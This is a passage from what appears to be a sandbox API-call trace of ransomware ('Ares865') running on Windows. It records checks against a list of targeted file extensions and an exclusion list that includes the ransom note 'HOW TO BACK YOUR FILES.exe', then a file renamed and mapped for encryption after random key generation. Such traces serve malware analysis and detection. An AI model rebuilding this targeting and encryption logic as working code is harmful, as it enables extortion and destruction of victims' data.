lpString2="db-journal") returned 1 [0065.301] lstrlenW (lpString="db-shm") returned 6 [0065.301] lstrcmpiW (lpString1="op.ini", lpString2="db-shm") returned 1 [0065.301] lstrlenW (lpString="db-wal") returned 6 [0065.301] lstrcmpiW (lpString1="op.ini", lpString2="db-wal") returned 1 [0065.301] lstrlenW (lpString="dbc") returned 3 [0065.301] lstrcmpiW (lpString1="ini", lpString2="dbc") returned 1 [0065.302] lstrlenW (lpString="dbs") returned 3 [0065.302] lstrcmpiW (lpString1="ini", lpString2="dbs") returned 1 [0065.302] lstrlenW (lpString="dbt") returned 3 [0065.302] lstrcmpiW (lpString1="ini", lpString2="dbt") returned 1 [0065.302] lstrlenW (lpString="dbv") returned 3 [0065.302] lstrcmpiW (lpString1="ini", lpString2="dbv") returned 1 [0065.302] lstrlenW (lpString="dbx") returned 3 [0065.302] lstrcmpiW (lpString1="ini", lpString2="dbx") returned 1 [0065.302] lstrlenW (lpString="dcb") returned 3 [0065.302] lstrcmpiW (lpString1="ini", lpString2="dcb") returned 1 [0065.302] lstrlenW (lpString="dct") returned 3 [0065.302] lstrcmpiW (lpString1="ini", lpString2="dct") returned 1 [0065.302] lstrlenW (lpString="dcx") returned 3 [0065.302] lstrcmpiW (lpString1="ini", lpString2="dcx") returned 1 [0065.302] lstrlenW (lpString="ddl") returned 3 [0065.302] lstrcmpiW (lpString1="ini", lpString2="ddl") returned 1 [0065.302] lstrlenW (lpString="dlis") returned 4 [0065.302] lstrcmpiW (lpString1=".ini", lpString2="dlis") returned -1 [0065.302] lstrlenW (lpString="dp1") returned 3 [0065.302] lstrcmpiW (lpString1="ini", lpString2="dp1") returned 1 [0065.302] lstrlenW (lpString="dqy") returned 3 [0065.302] lstrcmpiW (lpString1="ini", lpString2="dqy") returned 1 [0065.302] lstrlenW (lpString="dsk") returned 3 [0065.302] lstrcmpiW (lpString1="ini", lpString2="dsk") returned 1 [0065.302] lstrlenW (lpString="dsn") returned 3 [0065.302] lstrcmpiW (lpString1="ini", lpString2="dsn") returned 1 [0065.302] lstrlenW (lpString="dtsx") returned 4 [0065.302] lstrcmpiW (lpString1=".ini", lpString2="dtsx") returned -1 [0065.302] lstrlenW (lpString="dxl") returned 3 [0065.302] lstrcmpiW (lpString1="ini", lpString2="dxl") returned 1 [0065.302] lstrlenW (lpString="eco") returned 3 [0065.302] lstrcmpiW (lpString1="ini", lpString2="eco") returned 1 [0065.302] lstrlenW (lpString="ecx") returned 3 [0065.302] lstrcmpiW (lpString1="ini", lpString2="ecx") returned 1 [0065.302] lstrlenW (lpString="edb") returned 3 [0065.303] lstrcmpiW (lpString1="ini", lpString2="edb") returned 1 [0065.303] lstrlenW (lpString="epim") returned 4 [0065.303] lstrcmpiW (lpString1=".ini", lpString2="epim") returned -1 [0065.303] lstrlenW (lpString="fcd") returned 3 [0065.303] lstrcmpiW (lpString1="ini", lpString2="fcd") returned 1 [0065.303] lstrlenW (lpString="fdb") returned 3 [0065.303] lstrcmpiW (lpString1="ini", lpString2="fdb") returned 1 [0065.303] lstrlenW (lpString="fic") returned 3 [0065.303] lstrcmpiW (lpString1="ini", lpString2="fic") returned 1 [0065.303] lstrlenW (lpString="flexolibrary") returned 12 [0065.303] lstrlenW (lpString="fm5") returned 3 [0065.303] lstrcmpiW (lpString1="ini", lpString2="fm5") returned 1 [0065.303] lstrlenW (lpString="fmp") returned 3 [0065.303] lstrcmpiW (lpString1="ini", lpString2="fmp") returned 1 [0065.303] lstrlenW (lpString="fmp12") returned 5 [0065.303] lstrcmpiW (lpString1="p.ini", lpString2="fmp12") returned 1 [0065.303] lstrlenW (lpString="fmpsl") returned 5 [0065.303] lstrcmpiW (lpString1="p.ini", lpString2="fmpsl") returned 1 [0065.303] lstrlenW (lpString="fol") returned 3 [0065.303] lstrcmpiW (lpString1="ini", lpString2="fol") returned 1 [0065.303] lstrlenW (lpString="fp3") returned 3 [0065.303] lstrcmpiW (lpString1="ini", lpString2="fp3") returned 1 [0065.303] lstrlenW (lpString="fp4") returned 3 [0065.303] lstrcmpiW (lpString1="ini", lpString2="fp4") returned 1 [0065.303] lstrlenW (lpString="fp5") returned 3 [0065.303] lstrcmpiW (lpString1="ini", lpString2="fp5") returned 1 [0065.303] lstrlenW (lpString="fp7") returned 3 [0065.303] lstrcmpiW (lpString1="ini", lpString2="fp7") returned 1 [0065.303] lstrlenW (lpString="fpt") returned 3 [0065.303] lstrcmpiW (lpString1="ini", lpString2="fpt") returned 1 [0065.303] lstrlenW (lpString="frm") returned 3 [0065.303] lstrcmpiW (lpString1="ini", lpString2="frm") returned 1 [0065.303] lstrlenW (lpString="gdb") returned 3 [0065.303] lstrcmpiW (lpString1="ini", lpString2="gdb") returned 1 [0065.303] lstrlenW (lpString="gdb") returned 3 [0065.303] lstrcmpiW (lpString1="ini", lpString2="gdb") returned 1 [0065.303] lstrlenW (lpString="grdb") returned 4 [0065.304] lstrcmpiW (lpString1=".ini", lpString2="grdb") returned -1 [0065.304] lstrlenW (lpString="gwi") returned 3 [0065.304] lstrcmpiW (lpString1="ini", lpString2="gwi") returned 1 [0065.304] lstrlenW (lpString="hdb") returned 3 [0065.304] lstrcmpiW (lpString1="ini", lpString2="hdb") returned 1 [0065.304] lstrlenW (lpString="his") returned 3 [0065.304] lstrcmpiW (lpString1="ini", lpString2="his") returned 1 [0065.304] lstrlenW (lpString="ib") returned 2 [0065.304] lstrcmpiW (lpString1="ni", lpString2="ib") returned 1 [0065.304] lstrlenW (lpString="idb") returned 3 [0065.304] lstrcmpiW (lpString1="ini", lpString2="idb") returned 1 [0065.304] lstrlenW (lpString="ihx") returned 3 [0065.304] lstrcmpiW (lpString1="ini", lpString2="ihx") returned 1 [0065.304] lstrlenW (lpString="itdb") returned 4 [0065.304] lstrcmpiW (lpString1=".ini", lpString2="itdb") returned -1 [0065.304] lstrlenW (lpString="itw") returned 3 [0065.304] lstrcmpiW (lpString1="ini", lpString2="itw") returned -1 [0065.304] lstrlenW (lpString="jet") returned 3 [0065.304] lstrcmpiW (lpString1="ini", lpString2="jet") returned -1 [0065.304] lstrlenW (lpString="jtx") returned 3 [0065.304] lstrcmpiW (lpString1="ini", lpString2="jtx") returned -1 [0065.304] lstrlenW (lpString="kdb") returned 3 [0065.304] lstrcmpiW (lpString1="ini", lpString2="kdb") returned -1 [0065.304] lstrlenW (lpString="kexi") returned 4 [0065.304] lstrcmpiW (lpString1=".ini", lpString2="kexi") returned -1 [0065.304] lstrlenW (lpString="kexic") returned 5 [0065.304] lstrcmpiW (lpString1="p.ini", lpString2="kexic") returned 1 [0065.304] lstrlenW (lpString="kexis") returned 5 [0065.304] lstrcmpiW (lpString1="p.ini", lpString2="kexis") returned 1 [0065.304] lstrlenW (lpString="lgc") returned 3 [0065.304] lstrcmpiW (lpString1="ini", lpString2="lgc") returned -1 [0065.304] lstrlenW (lpString="lwx") returned 3 [0065.304] lstrcmpiW (lpString1="ini", lpString2="lwx") returned -1 [0065.304] lstrlenW (lpString="maf") returned 3 [0065.304] lstrcmpiW (lpString1="ini", lpString2="maf") returned -1 [0065.304] lstrlenW (lpString="maq") returned 3 [0065.304] lstrcmpiW (lpString1="ini", lpString2="maq") returned -1 [0065.304] lstrlenW (lpString="mar") returned 3 [0065.305] lstrcmpiW (lpString1="ini", lpString2="mar") returned -1 [0065.305] lstrlenW (lpString="marshal") returned 7 [0065.305] lstrcmpiW (lpString1="top.ini", lpString2="marshal") returned 1 [0065.305] lstrlenW (lpString="mas") returned 3 [0065.305] lstrcmpiW (lpString1="ini", lpString2="mas") returned -1 [0065.305] lstrlenW (lpString="mav") returned 3 [0065.305] lstrcmpiW (lpString1="ini", lpString2="mav") returned -1 [0065.305] lstrlenW (lpString="maw") returned 3 [0065.305] lstrcmpiW (lpString1="ini", lpString2="maw") returned -1 [0065.305] lstrlenW (lpString="mdbhtml") returned 7 [0065.305] lstrcmpiW (lpString1="top.ini", lpString2="mdbhtml") returned 1 [0065.305] lstrlenW (lpString="mdn") returned 3 [0065.305] lstrcmpiW (lpString1="ini", lpString2="mdn") returned -1 [0065.305] lstrlenW (lpString="mdt") returned 3 [0065.305] lstrcmpiW (lpString1="ini", lpString2="mdt") returned -1 [0065.305] lstrlenW (lpString="mfd") returned 3 [0065.305] lstrcmpiW (lpString1="ini", lpString2="mfd") returned -1 [0065.305] lstrlenW (lpString="mpd") returned 3 [0065.305] lstrcmpiW (lpString1="ini", lpString2="mpd") returned -1 [0065.305] lstrlenW (lpString="mrg") returned 3 [0065.305] lstrcmpiW (lpString1="ini", lpString2="mrg") returned -1 [0065.305] lstrlenW (lpString="mud") returned 3 [0065.305] lstrcmpiW (lpString1="ini", lpString2="mud") returned -1 [0065.305] lstrlenW (lpString="mwb") returned 3 [0065.305] lstrcmpiW (lpString1="ini", lpString2="mwb") returned -1 [0065.305] lstrlenW (lpString="myd") returned 3 [0065.305] lstrcmpiW (lpString1="ini", lpString2="myd") returned -1 [0065.305] lstrlenW (lpString="ndf") returned 3 [0065.305] lstrcmpiW (lpString1="ini", lpString2="ndf") returned -1 [0065.305] lstrlenW (lpString="nnt") returned 3 [0065.305] lstrcmpiW (lpString1="ini", lpString2="nnt") returned -1 [0065.305] lstrlenW (lpString="nrmlib") returned 6 [0065.305] lstrcmpiW (lpString1="op.ini", lpString2="nrmlib") returned 1 [0065.305] lstrlenW (lpString="ns2") returned 3 [0065.305] lstrcmpiW (lpString1="ini", lpString2="ns2") returned -1 [0065.305] lstrlenW (lpString="ns3") returned 3 [0065.306] lstrcmpiW (lpString1="ini", lpString2="ns3") returned -1 [0065.306] lstrlenW (lpString="ns4") returned 3 [0065.306] lstrcmpiW (lpString1="ini", lpString2="ns4") returned -1 [0065.306] lstrlenW (lpString="nsf") returned 3 [0065.306] lstrcmpiW (lpString1="ini", lpString2="nsf") returned -1 [0065.306] lstrlenW (lpString="nv") returned 2 [0065.306] lstrcmpiW (lpString1="ni", lpString2="nv") returned -1 [0065.306] lstrlenW (lpString="nv2") returned 3 [0065.306] lstrcmpiW (lpString1="ini", lpString2="nv2") returned -1 [0065.306] lstrlenW (lpString="nwdb") returned 4 [0065.306] lstrcmpiW (lpString1=".ini", lpString2="nwdb") returned -1 [0065.306] lstrlenW (lpString="nyf") returned 3 [0065.306] lstrcmpiW (lpString1="ini", lpString2="nyf") returned -1 [0065.306] lstrlenW (lpString="odb") returned 3 [0065.306] lstrcmpiW (lpString1="ini", lpString2="odb") returned -1 [0065.306] lstrlenW (lpString="odb") returned 3 [0065.306] lstrcmpiW (lpString1="ini", lpString2="odb") returned -1 [0065.306] lstrlenW (lpString="oqy") returned 3 [0065.306] lstrcmpiW (lpString1="ini", lpString2="oqy") returned -1 [0065.306] lstrlenW (lpString="ora") returned 3 [0065.306] lstrcmpiW (lpString1="ini", lpString2="ora") returned -1 [0065.306] lstrlenW (lpString="orx") returned 3 [0065.306] lstrcmpiW (lpString1="ini", lpString2="orx") returned -1 [0065.306] lstrlenW (lpString="owc") returned 3 [0065.306] lstrcmpiW (lpString1="ini", lpString2="owc") returned -1 [0065.306] lstrlenW (lpString="p96") returned 3 [0065.306] lstrcmpiW (lpString1="ini", lpString2="p96") returned -1 [0065.306] lstrlenW (lpString="p97") returned 3 [0065.306] lstrcmpiW (lpString1="ini", lpString2="p97") returned -1 [0065.306] lstrlenW (lpString="pan") returned 3 [0065.306] lstrcmpiW (lpString1="ini", lpString2="pan") returned -1 [0065.306] lstrlenW (lpString="pdb") returned 3 [0065.306] lstrcmpiW (lpString1="ini", lpString2="pdb") returned -1 [0065.306] lstrlenW (lpString="pdm") returned 3 [0065.306] lstrcmpiW (lpString1="ini", lpString2="pdm") returned -1 [0065.306] lstrlenW (lpString="pnz") returned 3 [0065.307] lstrcmpiW (lpString1="ini", lpString2="pnz") returned -1 [0065.307] lstrlenW (lpString="qry") returned 3 [0065.307] lstrcmpiW (lpString1="ini", lpString2="qry") returned -1 [0065.307] lstrlenW (lpString="qvd") returned 3 [0065.307] lstrcmpiW (lpString1="ini", lpString2="qvd") returned -1 [0065.307] lstrlenW (lpString="rbf") returned 3 [0065.307] lstrcmpiW (lpString1="ini", lpString2="rbf") returned -1 [0065.307] lstrlenW (lpString="rctd") returned 4 [0065.307] lstrcmpiW (lpString1=".ini", lpString2="rctd") returned -1 [0065.307] lstrlenW (lpString="rod") returned 3 [0065.307] lstrcmpiW (lpString1="ini", lpString2="rod") returned -1 [0065.307] lstrlenW (lpString="rodx") returned 4 [0065.307] lstrcmpiW (lpString1=".ini", lpString2="rodx") returned -1 [0065.307] lstrlenW (lpString="rpd") returned 3 [0065.307] lstrcmpiW (lpString1="ini", lpString2="rpd") returned -1 [0065.307] lstrlenW (lpString="rsd") returned 3 [0065.307] lstrcmpiW (lpString1="ini", lpString2="rsd") returned -1 [0065.307] lstrlenW (lpString="sas7bdat") returned 8 [0065.307] lstrcmpiW (lpString1="ktop.ini", lpString2="sas7bdat") returned -1 [0065.307] lstrlenW (lpString="sbf") returned 3 [0065.307] lstrcmpiW (lpString1="ini", lpString2="sbf") returned -1 [0065.307] lstrlenW (lpString="scx") returned 3 [0065.307] lstrcmpiW (lpString1="ini", lpString2="scx") returned -1 [0065.307] lstrlenW (lpString="sdb") returned 3 [0065.307] lstrcmpiW (lpString1="ini", lpString2="sdb") returned -1 [0065.307] lstrlenW (lpString="sdc") returned 3 [0065.307] lstrcmpiW (lpString1="ini", lpString2="sdc") returned -1 [0065.307] lstrlenW (lpString="sdf") returned 3 [0065.307] lstrcmpiW (lpString1="ini", lpString2="sdf") returned -1 [0065.307] lstrlenW (lpString="sis") returned 3 [0065.307] lstrcmpiW (lpString1="ini", lpString2="sis") returned -1 [0065.307] lstrlenW (lpString="spq") returned 3 [0065.307] lstrcmpiW (lpString1="ini", lpString2="spq") returned -1 [0065.307] lstrlenW (lpString="te") returned 2 [0065.307] lstrcmpiW (lpString1="ni", lpString2="te") returned -1 [0065.307] lstrlenW (lpString="teacher") returned 7 [0065.307] lstrcmpiW (lpString1="top.ini", lpString2="teacher") returned 1 [0065.308] lstrlenW (lpString="tmd") returned 3 [0065.308] lstrcmpiW (lpString1="ini", lpString2="tmd") returned -1 [0065.308] lstrlenW (lpString="tps") returned 3 [0065.308] lstrcmpiW (lpString1="ini", lpString2="tps") returned -1 [0065.308] lstrlenW (lpString="trc") returned 3 [0065.308] lstrcmpiW (lpString1="ini", lpString2="trc") returned -1 [0065.308] lstrlenW (lpString="trc") returned 3 [0065.308] lstrcmpiW (lpString1="ini", lpString2="trc") returned -1 [0065.308] lstrlenW (lpString="trm") returned 3 [0065.308] lstrcmpiW (lpString1="ini", lpString2="trm") returned -1 [0065.308] lstrlenW (lpString="udb") returned 3 [0065.308] lstrcmpiW (lpString1="ini", lpString2="udb") returned -1 [0065.308] lstrlenW (lpString="udl") returned 3 [0065.308] lstrcmpiW (lpString1="ini", lpString2="udl") returned -1 [0065.308] lstrlenW (lpString="usr") returned 3 [0065.308] lstrcmpiW (lpString1="ini", lpString2="usr") returned -1 [0065.308] lstrlenW (lpString="v12") returned 3 [0065.308] lstrcmpiW (lpString1="ini", lpString2="v12") returned -1 [0065.308] lstrlenW (lpString="vis") returned 3 [0065.308] lstrcmpiW (lpString1="ini", lpString2="vis") returned -1 [0065.308] lstrlenW (lpString="vpd") returned 3 [0065.308] lstrcmpiW (lpString1="ini", lpString2="vpd") returned -1 [0065.308] lstrlenW (lpString="vvv") returned 3 [0065.308] lstrcmpiW (lpString1="ini", lpString2="vvv") returned -1 [0065.308] lstrlenW (lpString="wdb") returned 3 [0065.308] lstrcmpiW (lpString1="ini", lpString2="wdb") returned -1 [0065.308] lstrlenW (lpString="wmdb") returned 4 [0065.308] lstrcmpiW (lpString1=".ini", lpString2="wmdb") returned -1 [0065.308] lstrlenW (lpString="wrk") returned 3 [0065.308] lstrcmpiW (lpString1="ini", lpString2="wrk") returned -1 [0065.308] lstrlenW (lpString="xdb") returned 3 [0065.308] lstrcmpiW (lpString1="ini", lpString2="xdb") returned -1 [0065.308] lstrlenW (lpString="xld") returned 3 [0065.308] lstrcmpiW (lpString1="ini", lpString2="xld") returned -1 [0065.308] lstrlenW (lpString="xmlff") returned 5 [0065.308] lstrcmpiW (lpString1="p.ini", lpString2="xmlff") returned -1 [0065.308] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\Default User\\Local Settings\\Microsoft\\Feeds Cache\\KQMHSVKD\\desktop.ini.Ares865") returned 87 [0065.309] MoveFileExW (lpExistingFileName="C:\\Users\\Default User\\Local Settings\\Microsoft\\Feeds Cache\\KQMHSVKD\\desktop.ini" (normalized: "c:\\users\\default user\\local settings\\microsoft\\feeds cache\\kqmhsvkd\\desktop.ini"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Microsoft\\Feeds Cache\\KQMHSVKD\\desktop.ini.Ares865" (normalized: "c:\\users\\default user\\local settings\\microsoft\\feeds cache\\kqmhsvkd\\desktop.ini.ares865"), dwFlags=0x1) returned 1 [0065.311] CreateFileW (lpFileName="C:\\Users\\Default User\\Local Settings\\Microsoft\\Feeds Cache\\KQMHSVKD\\desktop.ini.Ares865" (normalized: "c:\\users\\default user\\local settings\\microsoft\\feeds cache\\kqmhsvkd\\desktop.ini.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x164 [0065.311] GetFileSizeEx (in: hFile=0x164, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=67) returned 1 [0065.311] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3030020 [0065.314] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d3238 [0065.314] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0380 [0065.314] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0065.315] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0065.315] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0065.315] CreateFileMappingW (hFile=0x164, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x350, lpName=0x0) returned 0x118 [0065.316] MapViewOfFile (hFileMappingObject=0x118, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x350) returned 0x190000 [0065.317] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0065.318] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0065.318] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0065.318] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d32b0 [0065.318] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d32b0 | out: hHeap=0x2b0000) returned 1 [0065.318] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x332fc8 [0065.318] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x324fc8 [0065.318] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x332fc8 | out: hHeap=0x2b0000) returned 1 [0065.318] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x3250e0 [0065.318] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9b60 [0065.318] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3250e0 | out: hHeap=0x2b0000) returned 1 [0065.318] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9b60 | out: hHeap=0x2b0000) returned 1 [0065.318] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x324fc8 | out: hHeap=0x2b0000) returned 1 [0065.318] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0065.318] CloseHandle (hObject=0x118) returned 1 [0065.318] CloseHandle (hObject=0x164) returned 1 [0065.318] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d3238 | out: hHeap=0x2b0000) returned 1 [0065.318] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0380 | out: hHeap=0x2b0000) returned 1 [0065.318] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3030020 | out: hHeap=0x2b0000) returned 1 [0065.319] FindNextFileW (in: hFindFile=0x2cd068, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x6666440, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6666440, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfed03a6b, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="fwlink[1]", cAlternateFileName="FWLINK~1")) returned 1 [0065.319] lstrcmpiW (lpString1="fwlink[1]", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0065.319] lstrcmpiW (lpString1="fwlink[1]", lpString2="aoldtz.exe") returned 1 [0065.319] lstrcmpiW (lpString1="fwlink[1]", lpString2=".") returned 1 [0065.319] lstrcmpiW (lpString1="fwlink[1]", lpString2="..") returned 1 [0065.319] lstrcmpiW (lpString1="fwlink[1]", lpString2="windows") returned -1 [0065.319] lstrcmpiW (lpString1="fwlink[1]", lpString2="bootmgr") returned 1 [0065.319] lstrcmpiW (lpString1="fwlink[1]", lpString2="temp") returned -1 [0065.319] lstrcmpiW (lpString1="fwlink[1]", lpString2="pagefile.sys") returned -1 [0065.319] lstrcmpiW (lpString1="fwlink[1]", lpString2="boot") returned 1 [0065.319] lstrcmpiW (lpString1="fwlink[1]", lpString2="ids.txt") returned -1 [0065.319] lstrcmpiW (lpString1="fwlink[1]", lpString2="ntuser.dat") returned -1 [0065.319] lstrcmpiW (lpString1="fwlink[1]", lpString2="perflogs") returned -1 [0065.319] lstrcmpiW (lpString1="fwlink[1]", lpString2="MSBuild") returned -1 [0065.319] lstrlenW (lpString="fwlink[1]") returned 9 [0065.319] lstrlenW (lpString="C:\\Users\\Default User\\Local Settings\\Microsoft\\Feeds Cache\\KQMHSVKD\\desktop.ini") returned 79 [0065.319] lstrcpyW (in: lpString1=0x2cce488, lpString2="fwlink[1]" | out: lpString1="fwlink[1]") returned="fwlink[1]" [0065.319] lstrlenW (lpString="fwlink[1]") returned 9 [0065.319] lstrlenW (lpString="Ares865") returned 7 [0065.319] lstrcmpiW (lpString1="link[1]", lpString2="Ares865") returned 1 [0065.319] lstrlenW (lpString=".dll") returned 4 [0065.319] lstrcmpiW (lpString1="fwlink[1]", lpString2=".dll") returned 1 [0065.319] lstrlenW (lpString=".lnk") returned 4 [0065.319] lstrcmpiW (lpString1="fwlink[1]", lpString2=".lnk") returned 1 [0065.319] lstrlenW (lpString=".ini") returned 4 [0065.319] lstrcmpiW (lpString1="fwlink[1]", lpString2=".ini") returned 1 [0065.319] lstrlenW (lpString=".sys") returned 4 [0065.319] lstrcmpiW (lpString1="fwlink[1]", lpString2=".sys") returned 1 [0065.319] lstrlenW (lpString="fwlink[1]") returned 9 [0065.320] lstrlenW (lpString="bak") returned 3 [0065.320] lstrcmpiW (lpString1="[1]", lpString2="bak") returned -1 [0065.320] lstrlenW (lpString="ba_") returned 3 [0065.320] lstrcmpiW (lpString1="[1]", lpString2="ba_") returned -1 [0065.320] lstrlenW (lpString="dbb") returned 3 [0065.320] lstrcmpiW (lpString1="[1]", lpString2="dbb") returned -1 [0065.320] lstrlenW (lpString="vmdk") returned 4 [0065.320] lstrcmpiW (lpString1="k[1]", lpString2="vmdk") returned -1 [0065.320] lstrlenW (lpString="rar") returned 3 [0065.320] lstrcmpiW (lpString1="[1]", lpString2="rar") returned -1 [0065.320] lstrlenW (lpString="zip") returned 3 [0065.320] lstrcmpiW (lpString1="[1]", lpString2="zip") returned -1 [0065.320] lstrlenW (lpString="tgz") returned 3 [0065.320] lstrcmpiW (lpString1="[1]", lpString2="tgz") returned -1 [0065.320] lstrlenW (lpString="vbox") returned 4 [0065.320] lstrcmpiW (lpString1="k[1]", lpString2="vbox") returned -1 [0065.320] lstrlenW (lpString="vdi") returned 3 [0065.320] lstrcmpiW (lpString1="[1]", lpString2="vdi") returned -1 [0065.320] lstrlenW (lpString="vhd") returned 3 [0065.320] lstrcmpiW (lpString1="[1]", lpString2="vhd") returned -1 [0065.320] lstrlenW (lpString="vhdx") returned 4 [0065.320] lstrcmpiW (lpString1="k[1]", lpString2="vhdx") returned -1 [0065.320] lstrlenW (lpString="avhd") returned 4 [0065.320] lstrcmpiW (lpString1="k[1]", lpString2="avhd") returned 1 [0065.320] lstrlenW (lpString="db") returned 2 [0065.320] lstrcmpiW (lpString1="1]", lpString2="db") returned -1 [0065.320] lstrlenW (lpString="db2") returned 3 [0065.320] lstrcmpiW (lpString1="[1]", lpString2="db2") returned -1 [0065.320] lstrlenW (lpString="db3") returned 3 [0065.320] lstrcmpiW (lpString1="[1]", lpString2="db3") returned -1 [0065.320] lstrlenW (lpString="dbf") returned 3 [0065.320] lstrcmpiW (lpString1="[1]", lpString2="dbf") returned -1 [0065.320] lstrlenW (lpString="mdf") returned 3 [0065.320] lstrcmpiW (lpString1="[1]", lpString2="mdf") returned -1 [0065.320] lstrlenW (lpString="mdb") returned 3 [0065.320] lstrcmpiW (lpString1="[1]", lpString2="mdb") returned -1 [0065.320] lstrlenW (lpString="sql") returned 3 [0065.321] lstrcmpiW (lpString1="[1]", lpString2="sql") returned -1 [0065.321] lstrlenW (lpString="sqlite") returned 6 [0065.321] lstrcmpiW (lpString1="ink[1]", lpString2="sqlite") returned -1 [0065.321] lstrlenW (lpString="sqlite3") returned 7 [0065.321] lstrcmpiW (lpString1="link[1]", lpString2="sqlite3") returned -1 [0065.321] lstrlenW (lpString="sqlitedb") returned 8 [0065.321] lstrcmpiW (lpString1="wlink[1]", lpString2="sqlitedb") returned 1 [0065.321] lstrlenW (lpString="xml") returned 3 [0065.321] lstrcmpiW (lpString1="[1]", lpString2="xml") returned -1 [0065.321] lstrlenW (lpString="$er") returned 3 [0065.321] lstrcmpiW (lpString1="[1]", lpString2="$er") returned 1 [0065.321] lstrlenW (lpString="4dd") returned 3 [0065.321] lstrcmpiW (lpString1="[1]", lpString2="4dd") returned -1 [0065.321] lstrlenW (lpString="4dl") returned 3 [0065.321] lstrcmpiW (lpString1="[1]", lpString2="4dl") returned -1 [0065.321] lstrlenW (lpString="^^^") returned 3 [0065.321] lstrcmpiW (lpString1="[1]", lpString2="^^^") returned -1 [0065.321] lstrlenW (lpString="abs") returned 3 [0065.321] lstrcmpiW (lpString1="[1]", lpString2="abs") returned -1 [0065.321] lstrlenW (lpString="abx") returned 3 [0065.321] lstrcmpiW (lpString1="[1]", lpString2="abx") returned -1 [0065.321] lstrlenW (lpString="accdb") returned 5 [0065.321] lstrcmpiW (lpString1="nk[1]", lpString2="accdb") returned 1 [0065.321] lstrlenW (lpString="accdc") returned 5 [0065.321] lstrcmpiW (lpString1="nk[1]", lpString2="accdc") returned 1 [0065.321] lstrlenW (lpString="accde") returned 5 [0065.321] lstrcmpiW (lpString1="nk[1]", lpString2="accde") returned 1 [0065.321] lstrlenW (lpString="accdr") returned 5 [0065.321] lstrcmpiW (lpString1="nk[1]", lpString2="accdr") returned 1 [0065.321] lstrlenW (lpString="accdt") returned 5 [0065.321] lstrcmpiW (lpString1="nk[1]", lpString2="accdt") returned 1 [0065.321] lstrlenW (lpString="accdw") returned 5 [0065.321] lstrcmpiW (lpString1="nk[1]", lpString2="accdw") returned 1 [0065.321] lstrlenW (lpString="accft") returned 5 [0065.321] lstrcmpiW (lpString1="nk[1]", lpString2="accft") returned 1 [0065.321] lstrlenW (lpString="adb") returned 3 [0065.322] lstrcmpiW (lpString1="[1]", lpString2="adb") returned -1 [0065.322] lstrlenW (lpString="adb") returned 3 [0065.322] lstrcmpiW (lpString1="[1]", lpString2="adb") returned -1 [0065.322] lstrlenW (lpString="ade") returned 3 [0065.322] lstrcmpiW (lpString1="[1]", lpString2="ade") returned -1 [0065.322] lstrlenW (lpString="adf") returned 3 [0065.322] lstrcmpiW (lpString1="[1]", lpString2="adf") returned -1 [0065.322] lstrlenW (lpString="adn") returned 3 [0065.322] lstrcmpiW (lpString1="[1]", lpString2="adn") returned -1 [0065.322] lstrlenW (lpString="adp") returned 3 [0065.322] lstrcmpiW (lpString1="[1]", lpString2="adp") returned -1 [0065.322] lstrlenW (lpString="alf") returned 3 [0065.322] lstrcmpiW (lpString1="[1]", lpString2="alf") returned -1 [0065.322] lstrlenW (lpString="ask") returned 3 [0065.322] lstrcmpiW (lpString1="[1]", lpString2="ask") returned -1 [0065.322] lstrlenW (lpString="btr") returned 3 [0065.322] lstrcmpiW (lpString1="[1]", lpString2="btr") returned -1 [0065.322] lstrlenW (lpString="cat") returned 3 [0065.322] lstrcmpiW (lpString1="[1]", 